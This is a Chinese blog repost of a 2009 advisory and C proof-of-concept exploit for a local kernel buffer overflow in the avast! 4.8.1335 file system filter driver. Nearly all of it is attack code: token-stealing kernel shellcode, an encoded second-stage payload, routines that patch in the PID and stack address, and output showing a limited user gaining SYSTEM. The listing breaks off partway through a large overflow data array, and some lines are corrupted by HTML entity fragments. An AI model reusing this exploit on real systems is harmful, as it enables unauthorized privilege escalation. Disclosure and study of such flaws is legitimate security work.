标签为 "安全防护" 的存档

Avast! 4.8.1335 专业版本地核心缓冲区溢出漏洞

      Avast! 4.8.1335 专业版文件系统过滤驱动存在本地核心缓冲区溢出漏洞,此漏洞允许入侵者在Windows平台下用受限用户账户获取系统权限。

复制内容到剪贴板程序代码程序代码
#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>

/*
Program          : avast! 4.8.1335 Professionnel
Homepage         : http://www.avast.com
Discovery        : 2009/07/29
Author Contacted : 2009/07/31
Found by         : Heurs
This Advisory    : Heurs
Contact          : heurs@ghostsinthstack.org

//—– Application description

avast! antivirus software represents complete virus protection,
offering full desktop security including a resident shield.
This antivirus is certified by both ICSA Labs and West Coast
Labs Checkmark.

//—– Description of vulnerability

The File System Filter driver is prone to a local kernel buffer overflow.
This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
system from a limited user account.

//—– Proof Of Concept

http://www.sysdream.com/LocalEscalation_Avast.rar

//—– Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//—– Greetings

Virtualabs

//—–Exploitation

###############################################
Avast Kernel Buffer Overflow Vulnerability
Proof Of Concept…

===> Found : LocalEscalation_Avast.exe : 2676

Shellcode PID Uploaded !
Shellcode Redirect Uploaded !
Shellcode Stack Uploaded !
Connecting…    Found !
Handle : 0000001C
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\eleve\Bureau>whoami
SYSTEM
###############################################
*/

char UpdateAswMon [] = {
       0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00,
       0x00, 0x00, 0x00
   };

char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

int GetPidByName(char * name_Proc) {
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;
    
    PEntry.dwSize = sizeof(PROCESSENTRY32);
    hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hTool32 == INVALID_HANDLE_VALUE) {
                printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
                getch();
                exit(0);
                }
    if(!Process32First(hTool32, &PEntry)) {
                                printf("\nError ==> Process32First(hTool32, &PEntry)");
                                getch();
                                exit(0);
                                }
    if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
       printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
       return PEntry.th32ProcessID;
    }
    //printf(   "\n               Process  :  PID\n");
    while(Process32Next(hTool32, &PEntry) != 0){
        if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
                                       CloseHandle(hTool32);
                                       printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
                                       return PEntry.th32ProcessID;
                                       }
        //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID);
    }
    printf("\n%s n'a pas ete trouve.", name_Proc);
    getch();
    exit(0);
}

void MajShellcode(char * ProcessName){
 &nb
sp;   DWORD ProcessID;
     DWORD MagicWord = 0x41414141;
     int i;
    
     ProcessID = GetPidByName(ProcessName);
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) ProcessID & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
            printf("Shellcode PID Uploaded !\n");
            return;
         }
     }
     printf("Shellcode PID NOT Uploaded :\'(\n");
     return;
}

void MajRealShellcode(){
     int i;
     DWORD MagicWord = 0x11111111;
    
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) &RealShellcode & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) &RealShellcode & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = (
(
DWORD) &RealShellcode & 0xFF000000) >> 24;
            printf("Shellcode Redirect Uploaded !\n");
            return;
         }
     }
     printf("Shellcode Redirect NOT Uploaded :\'(\n");
     return;
}

int FindStack(){
     __asm__(
       "mov %eax, %esp\n\t"
       "leave\n\t"
       "ret\n\t"
       );
}

void MajRealStack(){
     int i;
     DWORD MagicWord = 0x22222222;
     DWORD StackLocation = FindStack();
    
     for (i=0; i<sizeof(ShellcodeMaster); i++) {
         if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
            ShellcodeMaster[i] = (DWORD) &StackLocation & 0x000000FF;
            ShellcodeMaster[i+1] = ((DWORD) &StackLocation & 0x0000FF00) >> 8;
            ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
            ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
            printf("Shellcode Stack Uploaded !\n");
            return;
         }
     }
     printf("Shellcode NOT Uploaded :\'(\n");
     return;
}

void AfficherListeFichiers(void) {
    HANDLE hFind;
    WIN32_FIND_DATAW FindData;
    char Dossier[1024];
    
    // Change de dossier
    SetCurrentDirectory(Dossier);
    
    // DÈbut de la recherche
    hFind=FindFirstFileW(L"*.*", &FindData);
    if (hFind!=INVALID_HANDLE_VALUE)
    {
        // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom
        printf("%ws\n",FindData.cFileName);
        // Fichiers suivants
        while (FindNextFileW(hFind, &FindData))
        {
            printf("%ws\n",FindData.cFileName);
        }
    }
    // Fin de la recherche
    FindClose(hFind);
}

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD InitVal=0;
    char welcome[1024], out[50];
    DWORD Crashing []={
        0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72,
        0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
        0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
        0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
        0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
        0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
        0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
        0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
        0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
        0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
        0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
        0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
        0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
        0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
        0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
        0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
        0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7,
        0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
        0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8,
        0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
        0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
        0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
        0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
        0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
        0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
        0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
        0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
        0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
        0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
        0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
        0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
        0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
        0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
        0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
        0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
        0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
        0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
        0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
        0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
        0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
        0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
        0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
        0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
        0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
        0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
        0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2,
        0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
        0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
        0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
        0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
        0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984,
        0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
        0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
        0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
        0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
        0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
        0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
        0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
        0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
        0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
        0x32685945, 0x55016b49, 0x994f9293, 0x599f9653,
        0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
        0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
        0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
        0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
        0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
        0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c,
        0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10,
        0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7,
        0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636,
        0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
        0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
        0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
        0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
        0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
        0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
        0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
        0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
        0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
        0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
        0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
        0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
        0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
        0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
        0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
        0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
        0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
 &n
bsp;      0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
        0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec,
        0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
        0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
        0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
        0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
        0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
        0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
        0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
        0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
        0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
        0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
        0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
        0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
        0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
        0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776,
        0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
        0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
        0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
        0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
        0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
        0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
        0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
        0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
        0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
        0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
        0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
        0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
        0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
        0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
        0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
        0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
        0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
        0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
      &nb
sp; 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
        0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
        0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
        0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
        0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
        0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
        0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977,
        0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
        0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
        0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
        0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
        0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
        0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd,
        0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
        0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
        0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
        0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84,
        0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
        0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
        0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
        0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
        0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
        0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
        0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
        0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
        0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
        0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
        0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
        0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
        0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
        0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
        0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
        0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
        0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
        0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c,
        0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
        0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
        0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
        0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
        0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069,
        0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
        0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
        0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
        0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529,
        0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
        0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
        0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
        0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
        0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
        0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943,
        0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
        0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
        0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
        0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
        0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
        0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
        0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
        0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
        0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
        0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387,
        0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
        0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
        0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
        0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
        0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
        0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
        0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
        0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
        0x20a8484b, 0x8c08
dd85, 0xc82a0739, 0xed52e038,
        0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
        0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
        0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
        0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
        0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37,
        0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
        0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
        0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
        0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
        0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
        0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
        0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
        0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
        0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
        0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
        0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
        0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
        0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2,
        0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
        0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
        0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984,
        0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
        0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
        0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
        0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
        0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
        0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
        0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
        0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
        0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
        0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
        0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
        0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
        0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43,
        0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
        0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa,
        0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
        0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d,
        0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
        0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
        0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
        0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
        0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
        0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
        0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
        0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
        0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
        0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
        0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
        0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
        0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
        0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
        0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
        0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
        0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530,
        0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb,
        0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
        0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
        0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
        0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
        0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
        0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
        0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
        0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
        0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
        0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
        0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f,
        0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6,
        0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
        0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
        0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
        0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9,
        0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
        0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
        0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
        0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70,
        0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
        0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
        0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
        0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
        0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
        0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
        0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
        0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
        0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
        0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
        0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67,
        0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
        0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
        0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
        0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
        0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362,
        0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
